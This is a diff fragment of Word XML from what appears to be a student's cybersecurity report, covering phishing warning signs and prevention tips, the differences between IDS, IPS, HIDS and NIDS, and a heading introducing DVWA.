+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>The attacker receives the credentials and access the site, thus taking over the victims’ accounts.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>How to identify phishing emails?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>The users’ names are replaced with something like “Dear customer”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The link in the email looks almost exactly like a trusted website but one letter was changed for example. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">When hovering on the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>link in the email, something suspicious appears on the left bottom instead of the trusted website.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Now that we know how the hacker might get to our system, how can we prevent this from happening? Here are some good steps to stay safe:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Delete every suspicious email that you detect.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Report any email that looks harmful.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Do not open attachments from untrusted emails.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Do not click on any image in the email as it might be a hidden button that sends you to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>the attacker’s website.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>If you work from home, make sure to set up a save network and pay attention to all the emails received.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc113747827"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+        <w:t>Host Intrusion Detection and Prevention</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> System</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (HIDS)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Explain the difference between NIDS and HIDS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>and IDS and IPS, and the meaning and relevance for your company.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>Select (open source) HIDS software and deploy it in your network. Show that it triggers on (simulated) malicious activity.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Intrusion Detection </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">System </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(IDS) is a method that strengthen the security against cyber crimes. It </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>detects malicious activities entering/leaving the network and start sending alerts to do something about it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>Intrusion Preventing System (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>IPS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> could do both, alerting and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>blocking</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the intruder from getting what they came for. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve"> Host Intrusion Detection </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>System</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (HIDS)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">HIDS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">only </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">monitors </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">one device in a network. It keeps waiting for any malicious activity on a specific device, then sending alerts. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">NIDS monitors a network segment. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">It keeps track of all the data entering and leaving a specific network. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>Why would you need to use HIDS when you can just use NIDS to monitor all the devices in the network?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-Well, the intruder might find another path to a specific device and use that path to send malicious packets. Therefore, when having a very private device, HIDS is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a better option. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:color w:val="2D3B45"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc113747828"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+        <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="7"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
